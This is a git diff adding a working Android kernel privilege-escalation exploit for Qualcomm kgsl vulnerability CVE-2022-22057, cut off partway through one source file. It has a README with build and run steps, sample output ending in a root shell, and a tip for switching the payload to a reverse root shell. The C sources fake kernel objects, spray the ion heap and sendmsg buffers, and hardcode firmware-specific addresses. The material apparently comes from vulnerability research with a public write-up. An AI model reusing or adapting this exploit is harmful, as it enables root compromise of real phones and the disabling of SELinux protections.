diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/README.md b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/README.md new file mode 100644 index 0000000..2fc658c --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/README.md @@ -0,0 +1,87 @@ +## Exploit for Qualcomm CVE-2022-22057 + +The write up can be found [here](https://github.blog/2022-06-16-the-android-kernel-mitigations-obstacle-race/). This is a bug in the Qualcomm kgsl driver that I reported in November 2021. The bug can be used to gain arbitrary kernel memory read and write from the untrusted app domain, which is then used to disable SELinux and gain root. + +The exploit is tested on the Samsung Galaxy Z Flip 3 (European version SM-F711B) with firmware version F711BXXS2BUL6, Baseband F711BXXU2BUL4 and Kernel version 5.4.86-qgki-23063627-abF711BXXS2BUL6 (EUX region). The offsets in the exploit refer to that version of the firmware. Apart from the usual offsets in the kernel image, various addresses of the ion memory pools in `ion_utils.c` are also firmware specific. For reference, I used the following command to compile with clang in ndk-21: + +``` +android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -O2 timeline_wait.c sendmsg_spray.c signalfd_spray.c cpu_utils.c ion_utils.c fake_obj_util.c work_queue_utils.c -o timeline +``` + +The exploit is reasonably reliable (~70% on tested device), although it does need to wait a few minutes after start up before running, as there are way too many broken/failed binder calls during the first few minutes of start up. (Not entirely sure whether it is a Qualcomm or Samsung problem) + +To test, cross compile the file and then execute with `adb`: + +``` +adb push timeline /data/local/tmp +adb shell +b2q:/ $ /data/local/tmp/timeline +``` + +If succeeded, it will disable SELinux and run the `id` command as root and write the results in the `/data/local/tmp/id.txt` file: + +``` +b2q:/ $ /data/local/tmp/timeline +heap_id_mask 40 +ion region 0x75a0ccf000 +region start addr: ffffff8071800000 +fence kernel addr: ffffff8071fe0040 192 +created fake slab at ffffff8071840100 +[+] reallocation data initialized! +[ ] initializing reallocation threads, please wait... +[+] 40 reallocation threads ready! +timeline_wait start +readpipe start +destroy start +readpipe +Caught signal: 10 + wait complete -1 +readpipe finished +destroy finished +cb_list ffffffc02d943bf8 temp ffffffc02d943c48 +mask 52424242 60 +cpu_id 0 +interval number 1 +mask 7f8e7bfeff 7 +thread number 0 7 20014 +thread batch number 0 +new mask 7f8e7bfeff ffffff8071840100 +region_offset 40100 +sprayed 1024 ion buffer +start searching for buffer +Found 7 ion regions +heap_ops ffffffc012e17180, kernel base: a00b8000 +set enforcing to permissive +[+] successfully overwritten selinux_enforcing +wq_ptr_addr: ffffffc012dc2518 +wq_addr: ffffff81f4cf1200 +pwq_addr ffffff81e24ea100 +pool_addr ffffff805ff7c000 +worklist ffffff805ff7c020 ffffff805ff7c020 +queue work +max_active 256 nr_active 0 +queuing work, waiting to aquire spin lock +work_queued +work processed +complete 0 +ret 0 +nr_active 0 +worklist ffffff805ff7c020 +work next ffffff8071842c08 +[+] successfully run command and added id.txt in /data/local/tmp +finished queue work +freeing ion dma fd +finished freeing ion dma fd +finished spraying +finished +``` +There is a long pause after `wait complete -1` is printed, which should be less than a minute, this is normal. It can sometimes also take a while to queue the work (after `queuing work, waiting to aquire spin lock` is printed, can be a couple of minutes, just need to be patient, although that is not common). The exploit normally completes in a couple of minutes. + +The file `/data/local/tmp/id.txt` should confirm that the command was run as root: + +``` +b2q:/ $ cat /data/local/tmp/id.txt +uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0 +``` + +A different command can be run by changing the variable `cmd` in `setup_sub_info` in `work_queue_utils.c`. (For example, to pop a reverse root shell). diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/addr_utils.h b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/addr_utils.h new file mode 100644 index 0000000..0843796 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/addr_utils.h @@ -0,0 +1,38 @@ +#ifndef ADDR_UTILS +#define ADDR_UTILS + +#define PHYS_TO_VIRT_OFF 0x8080000000ul + +#define VMEMMAP 0xfffffffefde00000ul + +#define KERNEL_PBASE 0xa0080000 + +#define KERNEL_VBASE 0xffffffc010080000ul + +//_text - kernel physical base +#define KERNEL_PHYS_OFF (KERNEL_VBASE - KERNEL_PBASE) + +static inline uint64_t page_align(uint64_t x) { + return (x >> 12) << 12; +} + +static inline uint64_t phys_to_virt(uint64_t x) { + return (uint64_t)(x) - PHYS_TO_VIRT_OFF; +} + +static inline uint64_t virt_to_phys_lm(uint64_t x) { + if (x & (1ul << 38)) err(1, "address is not in low mem range.\n"); + return x + PHYS_TO_VIRT_OFF; +} + +static inline uint64_t virt_to_phys(uint64_t x) { + if (x & (1ul << 38)) return x - (KERNEL_VBASE - KERNEL_PBASE); + return x + PHYS_TO_VIRT_OFF; +} + +static inline uint64_t phys_to_page(uint64_t phys_addr) { + //VMEMMAP interpreted as page pointer, so pfn needs to multiply by sizeof(struct page) + return (phys_addr >> 12) * 64 + VMEMMAP; +} + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/cpu_utils.c b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/cpu_utils.c new file mode 100644 index 0000000..38b4fc0 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/cpu_utils.c @@ -0,0 +1,45 @@ +#include +#include +#include +#include +#include +#include +#include +#include + +#include "cpu_utils.h" + +#define CPU_SETSIZE 1024 +#define __NCPUBITS (8 * sizeof (unsigned long)) +typedef struct +{ + unsigned long __bits[CPU_SETSIZE / __NCPUBITS]; +} cpu_set_t; + +#define CPU_SET(cpu, cpusetp) \ + ((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS))) +#define CPU_ZERO(cpusetp) \ + memset((cpusetp), 0, sizeof(cpu_set_t)) + +int migrate_to_cpu(int i) +{ + int syscallres; + pid_t pid = gettid(); + cpu_set_t cpu; + CPU_ZERO(&cpu); + CPU_SET(i, &cpu); + + syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu); + if (syscallres) + { + return -1; + } + return 0; +} + +int check_cpu_affinity() { + if (migrate_to_cpu(4) == -1) return 4; + if (migrate_to_cpu(5) == -1) return 5; + return -1; +} + diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/cpu_utils.h b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/cpu_utils.h new file mode 100644 index 0000000..85f53b3 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/cpu_utils.h @@ -0,0 +1,7 @@ +#ifndef CPU_UTILS +#define CPU_UTILS + +int migrate_to_cpu(int i); + +int check_cpu_affinity(); +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/fake_obj_util.c b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/fake_obj_util.c new file mode 100644 index 0000000..fe9e115 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/fake_obj_util.c @@ -0,0 +1,120 @@ +#include "fake_obj_util.h" +#include "addr_utils.h" + +static uint64_t vaddr_offset = 0; + +static inline uint64_t get_vaddr(struct list_head* ptr) { + return (uint64_t)ptr + vaddr_offset; +} + +static void init_list_head(struct list_head *list) +{ + list->next = get_vaddr(list); + list->prev = get_vaddr(list); +} + +static void list_add(struct list_head *new, struct list_head *prev, + struct list_head * start) +{ + start->prev = get_vaddr(new); + new->next = get_vaddr(start); + new->prev = get_vaddr(prev); + prev->next = get_vaddr(new); +} + +static uint64_t add_zero_filled_area(void* region, size_t offset) { + memset(region + offset, 0, ZERO_FILL_SZ); + return ZERO_FILL_SZ + offset; +} + +static struct list_head* get_list(struct kgsl_timeline_fence* fence) { + return &fence->node; +} + +static void init_fence(struct kgsl_timeline_fence* fence, uint64_t zero_fill_addr, int check) { + struct dma_fence* base = &fence->base; + base->flags = 0; + base->refcount = 0; + if (check) { + base->cb_list.next = 0x41414141; + base->cb_list.prev = 0x42424242; + + } else { + init_list_head(&base->cb_list); + } + base->ops = zero_fill_addr; +} + +static uint64_t create_fake_fences(void* region, uint64_t offset, uint64_t chain_size, uint64_t zero_fill_addr) { + struct kgsl_timeline_fence* start = (struct kgsl_timeline_fence*)(region + offset); + struct kgsl_timeline_fence* prev = start; + struct list_head* start_list = get_list(start); + struct list_head* prev_list = start_list; + init_list_head(start_list); + init_fence(start, zero_fill_addr, 0); + offset += 128; + for (uint64_t i = 1; i < chain_size; i++) { + struct kgsl_timeline_fence* curr = (struct kgsl_timeline_fence*)(region + offset); + struct list_head* curr_list = get_list(curr); + init_list_head(curr_list); + if (i == chain_size - 1) { + init_fence(curr, zero_fill_addr, 0); + } else { + init_fence(curr, zero_fill_addr, 0); + } + list_add(curr_list, prev_list, start_list); + prev = curr; + prev_list = curr_list; + offset += 128; + } + return offset; +} + +uint64_t fill_ion_heap(void* region, size_t chain_size, size_t region_size, uint64_t region_vaddr) { + if (sizeof(struct kgsl_timeline_fence) > 128) err(1, "kgsl_timeline_fence too big\n"); + if (chain_size < 2) err(1, "chain size should be greater than 1.\n"); + uint64_t fake_size = chain_size * 128 + ZERO_FILL_SZ; + if (fake_size > region_size) err(1, "chain of fake objects does not fit into region.\n"); + uint64_t offset = (region_size - fake_size)/2; + vaddr_offset = region_vaddr - (uint64_t)region; + uint64_t zero_fill_addr = region_vaddr + offset; + offset = add_zero_filled_area(region, offset); + uint64_t out = offset; + offset = create_fake_fences(region, offset, chain_size, zero_fill_addr); + return out; +} + +uint64_t poll_list_addr(void* fence_start, size_t chain_size, uint64_t fence_kstart) { + struct kgsl_timeline_fence* start = (struct kgsl_timeline_fence*)fence_start; + struct kgsl_timeline_fence* curr = (struct kgsl_timeline_fence*)fence_start; + struct dma_fence* base = &curr->base; + base->flags = 0; + struct list_head* cb_list = &base->cb_list; + if (cb_list->prev > (fence_kstart + chain_size * 128)) { + struct list_head* node = get_list(curr); + node->next = cb_list->prev + STACK_OFFSET; + base->refcount = 0; + base->flags = 1; + return cb_list->prev; + } + return 0; +} + +void create_fake_sgtable(uint8_t* table_region, uint64_t table_vaddr, uint64_t phys_addr, size_t len) { + struct sg_table* table = (struct sg_table*)table_region; + table->nents = 1; + table->orig_nents = 1; + table->sgl = (struct scatterlist*)(table_vaddr + 128); + struct scatterlist* sg = (struct scatterlist*)(table_region + 128); + uint64_t page_link = phys_to_page(phys_addr); + sg->page_link = page_link |= 0x2ul; + sg->length = len; + sg->offset = 0; +} + +void patch_ion_buffer(struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t phys_addr, size_t size) { + create_fake_sgtable(table_region, table_vaddr, (phys_addr >> 12) << 12, size); + buffer->sg_table = (struct sg_table*)table_vaddr; + buffer->size = size; +} + diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/fake_obj_util.h b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/fake_obj_util.h new file mode 100644 index 0000000..bff6d15 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/fake_obj_util.h @@ -0,0 +1,92 @@ +#ifndef FAKE_OBJ_UTIL +#define FAKE_OBJ_UTIL + +#include +#include +#include +#include +#include +#include +#include +#include + +#define ZERO_FILL_SZ 128 + +#define STACK_OFFSET 0x50 + +//offset of node in kgsl_timeline_fence +#define NODE_OFF 0x48 + +struct list_head { + uint64_t next, prev; +}; + +typedef struct { + int counter; +} atomic_t; + +typedef struct refcount_struct { + atomic_t refs; +} refcount_t; + +struct kref { + refcount_t refcount; +}; + +struct dma_fence { + void *lock; + uint64_t ops; + union { + struct list_head cb_list; + int64_t timestamp; + }; + uint64_t context; + uint64_t seqno; + unsigned long flags; + uint32_t refcount; + int error; +}; + +struct kgsl_timeline_fence { + struct dma_fence base; + void *timeline; + struct list_head node; +}; + +struct scatterlist { + unsigned long page_link; + unsigned int offset; + unsigned int length; + uint64_t dma_address; + unsigned int dma_length; +}; + +struct sg_table { + struct scatterlist *sgl; /* the list */ + unsigned int nents; /* number of mapped entries */ + unsigned int orig_nents; /* original size of list */ +}; + +struct ion_buffer { + struct list_head list; + void *heap; + unsigned long flags; + unsigned long private_flags; + size_t size; + void *priv_virt; + uint8_t lock[32]; + int kmap_cnt; + void *vaddr; + struct sg_table *sg_table; + struct list_head attachments; +}; + +uint64_t fill_ion_heap(void* region, size_t chain_size, size_t region_size, uint64_t region_vaddr); + +uint64_t poll_list_addr(void* fence_start, size_t chain_size, uint64_t region_vaddr); + +void fake_ion_heap(void* region); + +void patch_ion_buffer(struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t phys_addr, size_t size); + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/ion_utils.c b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/ion_utils.c new file mode 100644 index 0000000..f4173d9 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/ion_utils.c @@ -0,0 +1,94 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "ion_utils.h" + +uint64_t ion_heap_phys_addr(uint32_t id) { + //Specific to Z flip 3 + switch (id) { + case ION_AUDIO_ML_HEAP_ID: //audio_cma_region + return 0xe8000000; + case ION_SECURE_DISPLAY_HEAP_ID://secure_display_region + return 0xf2800000; + case ION_QSECOM_TA_HEAP_ID://qseecom_ta_region + return 0xe2000000; + case ION_QSECOM_HEAP_ID://qseecom_region + return 0xe6400000; + case ION_USER_CONTIG_HEAP_ID://user_contig_region + return 0xf1800000; + case ION_SPSS_HEAP_ID://sp_region + return 0xecc00000; + case ION_ADSP_HEAP_ID://sdsp_region + return 0xedc00000; + case ION_SECURE_CARVEOUT_HEAP_ID://ion_secure_carveout + return 0x80c00000; + default: + err(1, "heap does not have physical address\n"); + } +} + +uint64_t ion_heap_size(uint32_t id) { + //Specific to Z flip 3 + switch (id) { + case ION_AUDIO_ML_HEAP_ID: //audio_cma_region + return 28 * 1024 * 1024; + case ION_SECURE_DISPLAY_HEAP_ID://secure_display_region + return 212 * 1024 * 1024; + case ION_QSECOM_TA_HEAP_ID://qseecom_ta_region + return 32 * 1024 * 1024; + case ION_QSECOM_HEAP_ID://qseecom_region + return 28 * 1024 * 1024; + case ION_USER_CONTIG_HEAP_ID://user_contig_region + return 16 * 1024 * 1024; + case ION_SPSS_HEAP_ID://sp_region + return 16 * 1024 * 1024; + case ION_ADSP_HEAP_ID://sdsp_region + return 8 * 1024 * 1024; + case ION_SECURE_CARVEOUT_HEAP_ID://ion_secure_carveout + return 0x600000; + default: + err(1, "heap does not have physical address\n"); + } +} + +void* spray_ion_heap(uint32_t id, size_t size) { + int fd = open("/dev/ion", O_RDONLY); + if (fd == -1) err(1, "cannot open ion\n"); + void* region = map_ion_region(fd, id, size); + printf("ion region %p\n", region); + if (region == NULL) err(1, "failed to map ion\n"); + return region; +} + +int ion_allocate(int ion_fd, uint32_t id, size_t len) { + struct ion_allocation_data ion_alloc_data = {0}; + ion_alloc_data.len = len; + ion_alloc_data.heap_id_mask = id; + int ret = ioctl(ion_fd, ION_IOC_ALLOC, &ion_alloc_data); + if (ret < 0) err(1, "Failed to allocate ion buffer\n"); + return ion_alloc_data.fd; +} + +void* map_ion_region(int ion_fd, uint32_t id, size_t len) { + void* ion_region = NULL; + struct ion_allocation_data ion_alloc_data = {0}; + ion_alloc_data.len = len; + ion_alloc_data.heap_id_mask = id; + printf("heap_id_mask %x\n", ion_alloc_data.heap_id_mask); + int ret = ioctl(ion_fd, ION_IOC_ALLOC, &ion_alloc_data); + if (ret == -ENOMEM) return NULL; + if (ret < 0) err(1, "Failed to allocate ion buffer\n"); + ion_region = mmap(NULL, len, PROT_READ|PROT_WRITE, MAP_SHARED, ion_alloc_data.fd, 0); + if (ion_region == MAP_FAILED) { + err(1, "map failed"); + } + return ion_region; +} diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/ion_utils.h b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/ion_utils.h new file mode 100644 index 0000000..9f3652a --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/ion_utils.h @@ -0,0 +1,117 @@ +#ifndef ION_UTILS +#define ION_UTILS +#include + +enum ion_heap_type { + ION_HEAP_TYPE_SYSTEM, + ION_HEAP_TYPE_SYSTEM_CONTIG, + ION_HEAP_TYPE_CARVEOUT, + ION_HEAP_TYPE_CHUNK, + ION_HEAP_TYPE_DMA, + ION_HEAP_TYPE_CUSTOM, /* + * must be last so device specific heaps always + * are at the end of this enum + */ + ION_NUM_HEAPS = 16, +}; + +#define ION_HEAP_SYSTEM_MASK ((1 << ION_HEAP_TYPE_SYSTEM)) +#define ION_HEAP_SYSTEM_CONTIG_MASK ((1 << ION_HEAP_TYPE_SYSTEM_CONTIG)) +#define ION_HEAP_CARVEOUT_MASK ((1 << ION_HEAP_TYPE_CARVEOUT)) +#define ION_HEAP_TYPE_DMA_MASK ((1 << ION_HEAP_TYPE_DMA)) + +#define ION_NUM_HEAP_IDS (sizeof(unsigned int) * 8) +#define ION_FLAG_CACHED 1 +#define ION_FLAG_CACHED_NEEDS_SYNC 2 +struct ion_allocation_data { + size_t len; + unsigned int heap_id_mask; + unsigned int flags; + uint32_t fd; + uint32_t unused; +}; + +struct ion_custom_data { + unsigned int cmd; + unsigned long arg; +}; + +#define ION_IOC_MAGIC 'I' + +#define ION_IOC_ALLOC _IOWR(ION_IOC_MAGIC, 0, \ + struct ion_allocation_data) + +#define ION_IOC_FREE _IOWR(ION_IOC_MAGIC, 1, struct ion_handle_data) + +#define ION_IOC_MAP _IOWR(ION_IOC_MAGIC, 2, struct ion_fd_data) + +#define ION_IOC_SHARE _IOWR(ION_IOC_MAGIC, 4, struct ion_fd_data) + +#define ION_IOC_IMPORT _IOWR(ION_IOC_MAGIC, 5, struct ion_fd_data) + +#define ION_IOC_SYNC _IOWR(ION_IOC_MAGIC, 7, struct ion_fd_data) + +#define ION_IOC_CUSTOM _IOWR(ION_IOC_MAGIC, 6, struct ion_custom_data) + +#define ION_BIT(nr) (1UL << (nr)) + +#define ION_HEAP(bit) ION_BIT(bit) + +#define ION_QSECOM_TA_HEAP_ID ION_BIT(1) +#define ION_CAMERA_HEAP_ID ION_BIT(30) +#define ION_DISPLAY_HEAP_ID ION_BIT(3) +#define ION_ADSP_HEAP_ID ION_BIT(4) +#define ION_AUDIO_ML_HEAP_ID ION_BIT(5) +#define ION_USER_CONTIG_HEAP_ID ION_BIT(6) +#define ION_QSECOM_HEAP_ID ION_BIT(7) +#define ION_AUDIO_HEAP_ID ION_BIT(8) +#define ION_CP_MM_HEAP_ID ION_BIT(9) +#define ION_SECURE_HEAP_ID ION_BIT(10) +#define ION_SECURE_DISPLAY_HEAP_ID ION_BIT(11) +#define ION_SPSS_HEAP_ID ION_BIT(14) +#define ION_SECURE_CARVEOUT_HEAP_ID ION_BIT(15) +#define ION_TUI_CARVEOUT_HEAP_ID ION_BIT(16) +#define ION_AUDIO_CARVEOUT_HEAP_ID ION_BIT(17) +#define ION_SYSTEM_HEAP_ID ION_BIT(25) +#define ION_HEAP_ID_RESERVED ION_BIT(31) + +#define ION_ADSP_HEAP_NAME "adsp" +#define ION_SYSTEM_HEAP_NAME "system" +#define ION_MM_HEAP_NAME "mm" +#define ION_SPSS_HEAP_NAME "spss" +#define ION_CAMERA_HEAP_NAME "camera_heap" +#define ION_SECURE_CARVEOUT_HEAP_NAME "secure_carveout" +#define ION_USER_CONTIG_HEAP_NAME "user_contig" +#define ION_QSECOM_HEAP_NAME "qsecom" +#define ION_QSECOM_TA_HEAP_NAME "qsecom_ta" +#define ION_SECURE_HEAP_NAME "secure_heap" +#define ION_SECURE_DISPLAY_HEAP_NAME "secure_display" +#define ION_AUDIO_HEAP_NAME "audio" +#define ION_TUI_CARVEOUT_HEAP_NAME "tui_carveout" +#define ION_DISPLAY_HEAP_NAME "display" +#define ION_AUDIO_ML_HEAP_NAME "audio_ml" + +#define ION_HEAP_FLAG_DEFER_FREE (1 << 0) + +//Device/firmware specific +#define ION_HEAP_OPS_OBJ_OFF 0x30 + +#define ION_HEAP_FREELIST_OFF 0x120 + +#define ION_HEAP_FLAGS_OFF 0xc0 + +#define ION_HEAP_WAITQUEUE_OFF 0x140 + +#define ION_HEAP_OPS_OFF 0x2d5f180 + +uint64_t ion_heap_phys_addr(uint32_t id); + +void* map_ion_region(int ion_fd, uint32_t id, size_t len); + +uint64_t ion_heap_size(uint32_t id); + +void* spray_ion_heap(uint32_t id, size_t size); + +int ion_allocate(int ion_fd, uint32_t id, size_t len); + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/kgsl_ioctl.h b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/kgsl_ioctl.h new file mode 100644 index 0000000..cc4555a --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/kgsl_ioctl.h @@ -0,0 +1,209 @@ +#ifndef KGSL_IOCTL +#define KGSL_IOCTL + +#define VM_MAYWRITE 0x00000020 + +/* ioctls */ +#define KGSL_IOC_TYPE 0x09 + +#define IOCTL_KGSL_GPUOBJ_IMPORT \ + _IOWR(KGSL_IOC_TYPE, 0x48, struct kgsl_gpuobj_import) + +#define ION_IOC_MAGIC 'I' + +#define ION_IOC_ALLOC _IOWR(ION_IOC_MAGIC, 0, \ + struct ion_allocation_data) + +#define ION_IOC_FREE _IOWR(ION_IOC_MAGIC, 1, struct ion_handle_data) + +#define ION_IOC_MAP _IOWR(ION_IOC_MAGIC, 2, struct ion_fd_data) + +#define ION_IOC_SHARE _IOWR(ION_IOC_MAGIC, 4, struct ion_fd_data) + +#define ION_IOC_IMPORT _IOWR(ION_IOC_MAGIC, 5, struct ion_fd_data) + +#define ION_IOC_SYNC _IOWR(ION_IOC_MAGIC, 7, struct ion_fd_data) + +#define ION_IOC_CUSTOM _IOWR(ION_IOC_MAGIC, 6, struct ion_custom_data) + +#define ION_BIT(nr) (1UL << (nr)) + +#define ION_HEAP(bit) ION_BIT(bit) + +#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL + +#define KGSL_MEMFLAGS_SECURE 0x00000008ULL + +enum kgsl_user_mem_type { + KGSL_USER_MEM_TYPE_PMEM = 0x00000000, + KGSL_USER_MEM_TYPE_ASHMEM = 0x00000001, + KGSL_USER_MEM_TYPE_ADDR = 0x00000002, + KGSL_USER_MEM_TYPE_ION = 0x00000003, + /* + * ION type is retained for backwards compatibility but Ion buffers are + * dma-bufs so try to use that naming if we can + */ + KGSL_USER_MEM_TYPE_DMABUF = 0x00000003, + KGSL_USER_MEM_TYPE_MAX = 0x00000007, +}; + +struct kgsl_gpuobj_import { + uint64_t __user priv; + uint64_t priv_len; + uint64_t flags; + unsigned int type; + unsigned int id; +}; + +struct kgsl_gpuobj_import_dma_buf { + int fd; +}; + +struct kgsl_gpuobj_import_useraddr { + uint64_t virtaddr; +}; + +struct kgsl_gpuobj_free { + uint64_t flags; + uint64_t __user priv; + unsigned int id; + unsigned int type; + unsigned int len; +}; + +#define KGSL_GPUOBJ_FREE_ON_EVENT 1 + +#define KGSL_GPU_EVENT_TIMESTAMP 1 +#define KGSL_GPU_EVENT_FENCE 2 + +struct kgsl_gpu_event_timestamp { + unsigned int context_id; + unsigned int timestamp; +}; + +struct kgsl_gpu_event_fence { + int fd; +}; + +#define IOCTL_KGSL_GPUOBJ_FREE \ + _IOW(KGSL_IOC_TYPE, 0x46, struct kgsl_gpuobj_free) + +struct dma_buf_sync { + __u64 flags; +}; + +#define DMA_BUF_SYNC_READ (1 << 0) +#define DMA_BUF_SYNC_WRITE (2 << 0) +#define DMA_BUF_SYNC_RW (DMA_BUF_SYNC_READ | DMA_BUF_SYNC_WRITE) +#define DMA_BUF_SYNC_START (0 << 2) +#define DMA_BUF_SYNC_END (1 << 2) +#define DMA_BUF_SYNC_VALID_FLAGS_MASK \ + (DMA_BUF_SYNC_RW | DMA_BUF_SYNC_END) + +#define DMA_BUF_BASE 'b' +#define DMA_BUF_IOCTL_SYNC _IOW(DMA_BUF_BASE, 0, struct dma_buf_sync) + +#define KGSL_MEMFLAGS_FORCE_32BIT 0x100000000ULL + +struct kgsl_timeline_create { + __u64 seqno; + __u32 id; +/* private: padding for 64 bit compatibility */ + __u32 padding; +}; + +#define IOCTL_KGSL_TIMELINE_CREATE \ + _IOWR(KGSL_IOC_TYPE, 0x58, struct kgsl_timeline_create) + +/** + * struct kgsl_timeline_val - A container to store a timeline/sequence number + * pair. + * @seqno: Sequence number to signal/query + * @timeline: The timeline identifier to signal/query + * + * A container to store a timeline/seqno pair used by the query and signal + * ioctls. + */ +struct kgsl_timeline_val { + __u64 seqno; + __u32 timeline; +/* private: padding for 64 bit compatibility */ + __u32 padding; +}; + +#define KGSL_TIMELINE_WAIT_ALL 1 +#define KGSL_TIMELINE_WAIT_ANY 2 + +/** + * struct kgsl_timeline_wait - Argument for IOCTL_KGSL_TIMELINE_WAIT + * @tv_sec: Number of seconds to wait for the signal + * @tv_nsec: Number of nanoseconds to wait for the signal + * @timelines: Address of an array of &struct kgsl_timeline_val entries + * @count: Number of entries in @timeline + * @timelines_size: Size of each entry in @timelines + * @flags: One of KGSL_TIMELINE_WAIT_ALL or KGSL_TIMELINE_WAIT_ANY + * + * Wait for the timelines listed in @timelines to be signaled. If @flags is + * equal to KGSL_TIMELINE_WAIT_ALL then wait for all timelines or if + * KGSL_TIMELINE_WAIT_ANY is specified then wait for any of the timelines to + * signal. @tv_sec and @tv_nsec indicates the number of seconds and nanoseconds + * that the process should be blocked waiting for the signal. + */ +struct kgsl_timeline_wait { + __s64 tv_sec; + __s64 tv_nsec; + __u64 timelines; + __u32 count; + __u32 timelines_size; + __u32 flags; +/* private: padding for 64 bit compatibility */ + __u32 padding; +}; + +#define IOCTL_KGSL_TIMELINE_WAIT \ + _IOW(KGSL_IOC_TYPE, 0x59, struct kgsl_timeline_wait) + +#define IOCTL_KGSL_TIMELINE_QUERY \ + _IOWR(KGSL_IOC_TYPE, 0x5A, struct kgsl_timeline_val) + +/** + * struct kgsl_timeline_signal - argument for IOCTL_KGSL_TIMELINE_SIGNAL + * @timelines: Address of an array of &struct kgsl_timeline_val entries + * @count: Number of entries in @timelines + * @timelines_size: Size of each entry in @timelines + * + * Signal an array of timelines of type @struct kgsl_timeline_val. + */ +struct kgsl_timeline_signal { + __u64 timelines; + __u32 count; + __u32 timelines_size; +}; + +#define IOCTL_KGSL_TIMELINE_SIGNAL \ + _IOW(KGSL_IOC_TYPE, 0x5B, struct kgsl_timeline_signal) + +/** + * struct kgsl_timeline_fence_get - argument for IOCTL_KGSL_TIMELINE_FENCE_GET + * @seqno: Sequence number for the fence + * @timeline: Timeline to create the fence on + * @handle: Contains the fence fd for a successful operation [out] + * + * Create a sync file descriptor for the seqnum on the timeline and return it in + * @handle. Can be polled and queried just like any other sync file descriptor + */ +struct kgsl_timeline_fence_get { + __u64 seqno; + __u32 timeline; + int handle; +}; + +#define IOCTL_KGSL_TIMELINE_FENCE_GET \ + _IOWR(KGSL_IOC_TYPE, 0x5C, struct kgsl_timeline_fence_get) +/** + * IOCTL_KGSL_TIMELINE_DESTROY takes a u32 identifier for the timeline to + * destroy + */ +#define IOCTL_KGSL_TIMELINE_DESTROY _IOW(KGSL_IOC_TYPE, 0x5D, __u32) + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/sendmsg_spray.c b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/sendmsg_spray.c new file mode 100644 index 0000000..7c2e407 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/sendmsg_spray.c @@ -0,0 +1,187 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "sendmsg_spray.h" +#include "cpu_utils.h" + +//Taken from: https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part3.html + +int init_realloc_data(char* realloc_data, size_t obj_size, int level, int type) { + if (level == 1) err(1, "Level cannot be 1\n"); + struct cmsghdr *first; + + // necessary to pass checks in __scm_send() + first = (struct cmsghdr*) realloc_data; + first->cmsg_len = obj_size; + first->cmsg_level = level; + first->cmsg_type = type; + return 0; +} + +int init_unix_sockets(struct realloc_thread_arg * rta) { + struct timeval tv; + static int sock_counter = 0; + + if (((rta->recv_fd = socket(AF_UNIX, SOCK_DGRAM, 0)) < 0) || + ((rta->send_fd = socket(AF_UNIX, SOCK_DGRAM, 0)) < 0)) + { + perror("[-] socket"); + goto fail; + } + + memset(&rta->addr, 0, sizeof(rta->addr)); + rta->addr.sun_family = AF_UNIX; + sprintf(rta->addr.sun_path + 1, "sock_%x_%d", gettid(), ++sock_counter); + if (bind(rta->recv_fd, (struct sockaddr*)&rta->addr, sizeof(rta->addr))) + { + perror("[-] bind"); + goto fail; + } + + if (connect(rta->send_fd, (struct sockaddr*)&rta->addr, sizeof(rta->addr))) + { + perror("[-] connect"); + goto fail; + } + + memset(&tv, 0, sizeof(tv)); + if (setsockopt(rta->recv_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv))) { + err(1, "setsockopt"); + } + + return 0; +fail: + printf("[-] failed to initialize UNIX sockets!\n"); + return -1; +} + +static volatile size_t g_nb_realloc_thread_ready = 0; +static volatile size_t g_realloc_now[MAX_SENDMSG_BATCH] = {0}; + +static void* realloc_thread(void *arg) +{ + struct realloc_thread_arg *rta = (struct realloc_thread_arg*) arg; + struct msghdr mhdr; + char buf[200] = {0}; + + // initialize msghdr + struct iovec iov = { + .iov_base = buf, + .iov_len = sizeof(buf), + }; + memset(&mhdr, 0, sizeof(mhdr)); + mhdr.msg_iov = &iov; + mhdr.msg_iovlen = 1; + + // the thread should inherit main thread cpumask, better be 